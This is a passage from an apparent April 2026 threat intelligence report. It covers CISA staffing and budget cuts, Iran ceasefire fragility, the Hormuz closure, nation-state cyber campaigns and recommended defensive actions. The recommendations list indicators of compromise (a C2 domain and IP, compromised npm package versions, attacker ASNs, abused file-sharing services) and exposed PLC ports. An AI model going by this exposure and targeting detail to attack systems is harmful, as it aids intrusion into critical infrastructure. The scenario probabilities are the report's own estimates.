The proposed $707M FY2027 CISA budget reduction represents a 24% cut from the approximately $2.9 billion current budget. The reduction targets stakeholder engagement programs, international coordination, state and local election infrastructure funding, and disinformation monitoring—precisely the functions most relevant to the current multi-front threat environment. Combined with the pre-existing approximately 40% vacancy rate (CISA carrying fewer than 2,400 active staff from a pre-2025 baseline of 3,700+), the agency’s operational capacity is approaching a threshold below which core mission delivery becomes structurally impaired. Suspended proactive functions include vulnerability assessments, sector-wide drills, CI assessments, international engagements, and strategic threat detection programs. The timing paradox is acute: the $707M cut was announced April 7—the same day a joint FBI/NSA/CISA/DOE advisory confirmed active Iranian infiltration of U.S. drinking water and power plant control systems. The structural gap between defensive demand (four CRITICAL-rated nation-state threats, confirmed ICS compromises, active ceasefire instability) and CISA capacity has never been wider. Former officials note that CISA’s role as “connective tissue” for federal civilian cyber defense cannot be replicated by any other agency, and its degradation creates cascading effects across the entire defensive ecosystem.

3.1a Ceasefire Terms and Fragility Analysis

The two-week ceasefire announced April 7–8 was brokered by Pakistan following intense shuttle diplomacy and a series of escalating Trump ultimatums. The ceasefire terms, as publicly disclosed, include: immediate halt to hostilities between the United States, Israel, and Iran; Iran to immediately reopen the Strait of Hormuz to international shipping; a 15–20-day negotiation period between U.S. and Iranian delegations (talks to begin in Islamabad April 10–11); and Iran’s 10-point plan accepted as “a workable basis on which to negotiate.” Iran’s 10-point plan reportedly includes: permanent end to the war, lifting of all sanctions, reparations, sovereignty over the Strait of Hormuz, protection of Hezbollah, and withdrawal of all U.S. forces from the region—conditions that are functionally non-starters for Washington. The ceasefire was immediately violated by Israel, which continued airstrikes in Lebanon under “Operation Eternal Darkness.” Iran responded by re-closing Hormuz on April 8, citing Israeli violations. By April 9, Iran’s parliamentary speaker declared “time is running out” for the ceasefire to hold. The structural fragility is compounded by mutually exclusive victory narratives: the U.S. claims Iran capitulated following the elimination of Supreme Leader Khamenei and IRGC command structure degradation, while Iran claims the U.S. accepted its 10-point plan under duress. Both narratives cannot be true, and the Islamabad negotiations will expose this fundamental contradiction.

3.1b Strait of Hormuz Current Status

Despite the ceasefire, the Strait of Hormuz remains effectively closed as of April 10, 2026. Pre-crisis, approximately 135 ships transited the strait daily, carrying roughly 20% of global oil supply. During the April 5–6 deadline period, daily transits collapsed to 8–10 ships. Following the ceasefire announcement, Iran imposed tolls exceeding $1 million per ship and mandated cargo inspections, resulting in approximately 15 ships per day by April 10. Over 800 tankers remain stranded or waiting near the chokepoint. Iran has described the strait as a “permission-only corridor” for selected friendly-flag vessels. Brent crude has approached $120/barrel. The economic impact extends beyond petroleum: fertilizer supply chains, LNG shipments, and containerized goods are all disrupted. Iran’s explicit extension of threats to Bab al-Mandeb (April 6) creates risk to the Red Sea cable and shipping corridor that serves as the primary alternative route for Gulf producers using the Yanbu pipeline. Simultaneous disruption of Hormuz and Bab al-Mandeb would constitute the most significant chokepoint crisis since the 1973 oil embargo.

3.5a Forecast: 30-Day Scenario Analysis

Scenario 1 (Ceasefire Holds, Negotiations Progress — Probability: 25–30%): Islamabad talks produce a framework agreement extending the ceasefire with specific benchmarks for Hormuz reopening and de-escalation. In this scenario, Iranian cyber operations continue against Israel but at reduced tempo against U.S. targets. DPRK crypto theft operations continue unabated. Chinese pre-summit espionage remains elevated through the Trump-Xi meeting. Russian APT operations continue at wartime tempo on the Ukraine front with reduced Iran-theater activity. Hacktivist groups maintain operational capability but reduce public claims.

Scenario 2 (Ceasefire Collapses — Probability: 40–45%): Negotiations fail on the Lebanon inclusion question or Iran’s maximalist conditions prove irreconcilable. In this scenario, expect immediate resumption of kinetic operations, Handala wiper campaigns against U.S. organizations at or above Stryker scale, CyberAv3ngers escalation from PLC manipulation to disruptive operations at water and energy facilities, potential undersea cable interdiction, coordinated Russia-Iran cyber surge against energy and logistics infrastructure, and DPRK actors potentially exploiting the chaos for additional supply chain compromises.

Scenario 3 (Extended Ceasefire with Gradual Hormuz Reopening — Probability: 25–30%): Iran partially reopens Hormuz under oversight while negotiations continue through an extended framework. In this scenario, cyber operations continue at elevated but manageable tempo. Handala maintains Israel-focused operations but delays U.S. attack resumption. The primary risk shifts to pre-positioned access (MuddyWater in U.S. bank/airport, CyberAv3ngers PLC access) being activated during a future escalation. CISA’s degraded capacity becomes the binding constraint on U.S. defensive posture.

3.3a NATO Locked Shields 2026 — Exercise Assessment

NATO’s Locked Shields 2026, organized by the Cooperative Cyber Defence Centre of Excellence (CCDCOE) in Tallinn, is the world’s largest live-fire cyber defense exercise. The exercise entered its main phase during the reporting period following the Partners’ Run on March 26, which served as the final rehearsal. The 2026 iteration includes approximately 4,000 participants from 40 nations defending against approximately 6,000 simulated cyberattacks across cloud infrastructure, AI-driven attack scenarios, and increasingly complex information environment tracks. The exercise includes legal, strategic decision-making, and communications tracks alongside technical defense scenarios. Preparation milestones included the September 2025 Initial Planning Conference in Tallinn (300 participants, 35 countries), the January 23 Blue Team Leadership Conference in Riga, and the January 29 Main Planning Conference in Tallinn (100 representatives, 38 countries). The exercise’s timing is directly relevant to the current threat environment: national Blue Teams are training to defend critical infrastructure against live attacks at precisely the moment Iran-linked actors are actively compromising U.S. and allied ICS/OT systems, Russian APTs are targeting NATO logistics networks via PRISMEX, and Chinese actors maintain persistent access to telecom infrastructure.

3.3b U.S. Midterm Elections — Early Warning

The November 2026 U.S. midterm elections, while seven months away, warrant early inclusion in the escalation calendar given the documented capabilities and intent of all four nation-state actors. Russia’s demonstrated information warfare infrastructure (NoName057(16), CARR, hacktivist proxy network) and formal TASS-KCNA cooperation agreement create a scalable narrative amplification capability. China’s GoLaxy-style cognitive warfare databases—documented targeting Taiwan with 23 million household records and AI-driven propaganda—represent a template that could be adapted for U.S. election interference. Iran’s Cotton Sandstorm (Emennet Pasargad), sanctioned by the EU for the 2024 Paris Olympics disinformation operations, has documented AI-generated content and influence operation capabilities. DPRK’s motivation for election interference is less direct but its IT worker operations and social engineering campaigns create infrastructure that could be repurposed. The CISA budget cut’s elimination of “state and local election infrastructure funding” and “disinformation and misinformation monitoring efforts” creates a defensive gap precisely in the functions most relevant to election security.

3.4 CISA Degradation Assessment

The Cybersecurity and Infrastructure Security Agency faces a structural crisis that directly impacts U.S. defensive posture. An additional $707M FY2027 budget cut was announced on April 7—the same day the six-agency ICS advisory confirmed active Iranian exploitation of U.S. water and energy infrastructure. The proposed cut eliminates approximately 900 positions on top of a pre-existing approximately 40% vacancy rate, reducing total staffing to approximately 2,600 from a pre-2025 baseline of 3,700+. Suspended functions include proactive vulnerability assessments, sector-wide drills, CI assessments, international engagements, and strategic threat detection programs. The structural gap between defensive demand and CISA capacity has never been wider. As one analyst noted: “The White House wants CISA to focus solely on protecting the federal government’s computer systems and to leave states, local governments and private industry to fend for themselves.”

3.5 Strategic Outlook and Forecast (Next 30–90 Days)

The next 30–90 days represent the most geopolitically loaded and cyber-intensive window since the beginning of the multi-front crisis. The ceasefire’s fragility creates a binary outcome: successful Islamabad negotiations extend the diplomatic track, while failure triggers immediate resumption of kinetic and cyber escalation. Iranian cyber operations will continue regardless of kinetic status, as explicitly declared by Handala. China’s pre-summit intelligence collection is at peak intensity, with CISA’s degradation creating maximum collection opportunity. DPRK crypto theft operations show no signs of abating and may accelerate as Drift Protocol laundering proceeds. Russia’s spring offensive stall may redirect cyber assets toward the Iran theater for asymmetric pressure. The EO 14390 May 5 deadline arrives with an operationally diminished CISA unable to serve as effective implementation partner. NATO Locked Shields 2026 provides allied cyber defense rehearsal at the exact moment it is most needed.

3.5b Intelligence Gaps and Collection Priorities

The following intelligence gaps have been identified as priorities for the next collection cycle (April 10–17, 2026):

• FBI DCS-3000 Formal Attribution: No public attribution to a named threat actor has been issued. Confirmation or denial of Salt Typhoon involvement would significantly alter the counterintelligence damage assessment and response framework. Monitor for congressional testimony, FISMA reporting updates, or interagency advisory publications.

• Ceasefire Durability: Whether the Islamabad negotiations (beginning April 10–11) produce a framework agreement extending the two-week ceasefire is the single most consequential variable for the near-term cyber threat environment. Diplomatic failure triggers immediate multi-domain escalation.

• Handala Next Operation: The group’s explicit statement that cyber war continues independently of military truces, combined with Nozomi Networks’ prediction of a “Stryker-scale” attack during the ceasefire, creates an elevated watch priority. Monitor Handala’s X and Telegram channels for targeting indicators.

• Rockwell PLC Exploitation Scope: The April 7 advisory confirmed operational disruption at unnamed facilities but did not disclose specific victims, geographic distribution of compromised systems, or whether attackers have achieved capability for destructive operations versus the manipulation and monitoring currently confirmed. Monitor ICS-CERT follow-on advisories.

• BPFdoor Victim Geography: Rapid7 did not disclose specific affected carriers or countries for the BPFdoor campaign. “Middle East and Asia” is the reported regional scope. The full extent of Red Menshen’s telecom backbone access remains unknown.

• Axios Downstream Impact: Mandiant’s assessment that impact assessment “will likely take several months” means secondary exploitation of stolen credentials from the March 31 exposure window is ongoing or imminent. Monitor for abnormal activity in npm token registries and CI/CD pipeline logs.

• Salt Typhoon Eviction Status: AT&T and Verizon continue to withhold Mandiant security assessments, and Senator Cantwell’s February 2026 letter demanding CEO testimony remains unresolved. Whether telecoms have actually evicted Salt Typhoon remains an open and critical question.

• Undersea Cable Interdiction Preparation: Whether IRGC’s verbal threats to cables have been accompanied by physical positioning of midget submarines, combat diver units, or underwater vehicles near cable corridors in the Strait of Hormuz or Bab al-Mandeb. Maritime intelligence feeds and undersea monitoring are the primary collection vectors.

• Iran Internet Restoration Timeline: Any increase above the current approximately 1% connectivity level would be the most important indicator of impending high-end APT operation resumption from within Iran. Monitor NetBlocks and OONI data.

• Trump-Xi Summit Outcomes: Whether the Beijing summit produces any cyber-related deliverables—such as mutual restraint commitments, tech export control agreements, or sanctions discussions—has direct implications for the Chinese APT threat level in the post-summit period.

3.5c Historical Precedent Analysis

The current threat environment has limited historical precedent in its combination of simultaneous active kinetic conflict, confirmed critical infrastructure compromises across multiple sectors, nation-state cyber coordination at scale, and structural degradation of the primary federal cyber defense agency. The closest historical analogs provide partial insight:

The 2022 Ukraine invasion triggered coordinated Russian cyber operations (Sandworm wipers, hacktivist DDoS, Gamaredon mass phishing) but was confined to one theater and one primary adversary. The current environment involves four nation-state actors operating across the Middle East, Europe, and the U.S. homeland simultaneously. The 2023 Israel-Hamas conflict activated Iranian cyber proxies including CyberAv3ngers’ Unitronics campaign, but Iranian state capabilities were largely intact and unconstrained. The current environment features Iranian state capabilities degraded by kinetic strikes and a 41-day internet blackout, with proxy operations becoming the primary threat vector by default rather than design. The 2017 NotPetya attack demonstrated destructive cyber capability at global scale but was a single operation rather than a sustained campaign environment. The current environment features multiple concurrent sustained campaigns (PRISMEX, BPFdoor, Rockwell PLC exploitation, Axios supply chain) operating simultaneously across different sectors and adversaries.

The distinguishing factor of the current environment is convergence: not merely multiple threats operating in parallel, but documented coordination between adversarial states (Russia-Iran cyber collaboration, China-Iran BeiDou integration, Russia-DPRK information warfare formalization) creating compounding effects that exceed the sum of individual threats. The Atlantic Council’s “Axis of Evasion” framework and the Ukrainian intelligence assessment of April 7 provide the strongest evidence that this convergence is structural rather than coincidental—driven by shared geopolitical interests, overlapping targets, and emergent infrastructure sharing at the group and tool level.

3.5d Defense Posture Assessment

The U.S. defensive posture is assessed as structurally inadequate for the current threat environment across three dimensions. First, federal capacity: CISA’s approximately 40% vacancy rate and proposed $707M FY2027 cut eliminate the agency’s ability to perform proactive vulnerability assessments, sector-wide drills, and international coordination at the precise moment when all three functions are most needed. The agency’s website was last updated February 17, 2026, and many of its proactive programs have been suspended. Second, critical infrastructure exposure: 5,219 internet-exposed Rockwell PLCs (74.6% in the U.S.), persistent Salt Typhoon access in 200+ telecom companies, kernel-level BPFdoor implants in telecom backbone infrastructure, and MuddyWater backdoors in U.S. banking and aviation networks create an attack surface that existing detection and response capabilities cannot fully monitor. Third, deterrence erosion: the Trump administration’s decision to halt Salt Typhoon sanctions removes diplomatic deterrence for Chinese operations; the sub-24-hour reconstitution of Handala after FBI domain seizures demonstrates the inadequacy of infrastructure-focused disruption; and the explicit Handala declaration that cyber operations will continue regardless of military ceasefire signals that Iranian deterrence frameworks have failed for non-state proxies.

Compensating factors include: the multi-agency advisory architecture demonstrated by the April 7 six-agency alert shows federal coordination capability remains functional for reactive responses; NATO’s Locked Shields 2026 exercise is currently stress-testing allied defensive capabilities under realistic conditions; and private sector threat intelligence (Mandiant, CrowdStrike, Rapid7, Trend Micro, Unit 42) continues to provide high-quality detection and attribution research that partially compensates for reduced federal analytical capacity. However, these compensating factors are insufficient to offset the structural degradation of CISA as the “connective tissue” between federal, state, local, and private sector cyber defense.

PART 4: RECOMMENDED ACTIONS

4.1 Immediate Actions (24–72 Hours)

1. Audit ALL Rockwell Automation Allen-Bradley PLC environments per the April 7 six-agency advisory (AA26-097A). Remove PLCs from public internet. Set physical mode switches to RUN position. Review logs for inbound traffic on TCP 44818, 2222, 102, 502, and 22.

2. Verify no Drift Protocol/UNC4736 exposure in organizational DeFi or cryptocurrency holdings. Audit Solana governance multisig configurations for durable nonce abuse. Review any interactions with recently created trading entities.

3. Run BPFdoor detection scripts (Rapid7) on all Linux systems in telecom, carrier-grade, or critical infrastructure environments. Baseline BPF filter activity and audit for kernel-level anomalies.

4. Patch CVE-2026-35616 (Fortinet FortiClient EMS) and CVE-2026-1340 (Ivanti EPMM) immediately. Both are in CISA KEV with high Chinese APT exploitation relevance.

5. Audit npm dependency trees for Axios transitive contamination. Search for plain-crypto-js in node_modules. Block C2 traffic to sfrclak[.]com and 142.11.206.73. Treat any system that installed axios@1.14.1 or axios@0.30.4 as fully compromised.

6. Review DNS infrastructure for Operation Masquerade/FrostArmada residual compromise. Verify DNS settings on all TP-Link WR841N and MikroTik routers. Check for unauthorized DNS resolver changes.

4.2 Near-Term Actions (1–4 Weeks)

1. Harden Microsoft Intune/Entra ID configurations per CISA endpoint management advisory. Enforce phishing-resistant MFA. Implement multi-admin approval for device wipe and script execution actions.

2. Review ISP vendor access to internal surveillance, law enforcement, or sensitive systems. The FBI DCS-3000 breach vector (ISP vendor pivot) applies to any organization with vendor-managed network components.

3. Block traffic from identified TA416 VPS ASNs (AS149440, AS6134, AS138915) at perimeter. Audit inbound email from external government and diplomatic addresses for PlugX delivery indicators.

4. Conduct tabletop exercise simulating Iranian ICS/OT intrusion escalation from reconnaissance/manipulation to disruptive/destructive phase, incorporating the Stryker Intune wiper template.

5. Evaluate blocking or monitoring cloud storage services abused by APT28: filen.io, icedrive.net, and webhook.site.

4.3 Ongoing/Strategic

1. Establish continuous monitoring of ceasefire status. Prepare cyber incident response plans for immediate activation upon ceasefire collapse (approximately April 21–22 expiration window).

2. Review DNI 2026 Annual Threat Assessment with organizational leadership as authoritative IC endorsement of CRITICAL threat levels from all four nation-state actors. Use as basis for budget and staffing justifications.

3. Maintain npm/PyPI package monitoring for DPRK supply chain variants. Implement version cooldown policies (min-release-age=7d) across all package managers.

4. Monitor for Handala attack resumption signals on X and Telegram. The group’s explicit pledge to resume U.S. attacks “when conditions permit” should drive continuous monitoring and elevated alert posture.

4.1a Priority Justification

The immediate actions above are prioritized based on three criteria: confirmed active exploitation (the six-agency advisory confirms Iranian actors are currently inside Rockwell PLC environments), scope of potential impact (Axios supply chain propagation could affect millions of downstream applications), and time sensitivity (CVE-2026-35616 and CVE-2026-1340 are in CISA KEV with historical patterns showing Chinese APT exploitation within days of disclosure). The Rockwell PLC audit is the highest priority because it addresses confirmed active compromises at U.S. water and energy facilities where operational disruption has already been documented. Organizations should treat the advisory’s recommendations as mandatory regardless of whether they believe they are specifically targeted—the 5,219 exposed Rockwell devices create a target-rich environment for opportunistic exploitation.

4.2a Risk Mitigation Framework

Near-term actions focus on hardening the attack surfaces most actively exploited during this period. Microsoft Intune/Entra ID hardening addresses the Stryker attack vector, which demonstrated that weaponizing legitimate MDM tools can bypass traditional security controls. ISP vendor access audits address the DCS-3000 attack vector, where commercial third-party infrastructure provided the pivot point into federal systems. TA416/Mustang Panda infrastructure blocking addresses the most geographically expansive Chinese espionage campaign targeting European and Middle Eastern diplomatic missions. The tabletop exercise recommendation addresses the specific gap in ICS/OT incident response capability that the six-agency advisory has exposed: many water and energy utilities lack tested procedures for responding to PLC manipulation because their existing response plans were designed for IT-centric incidents.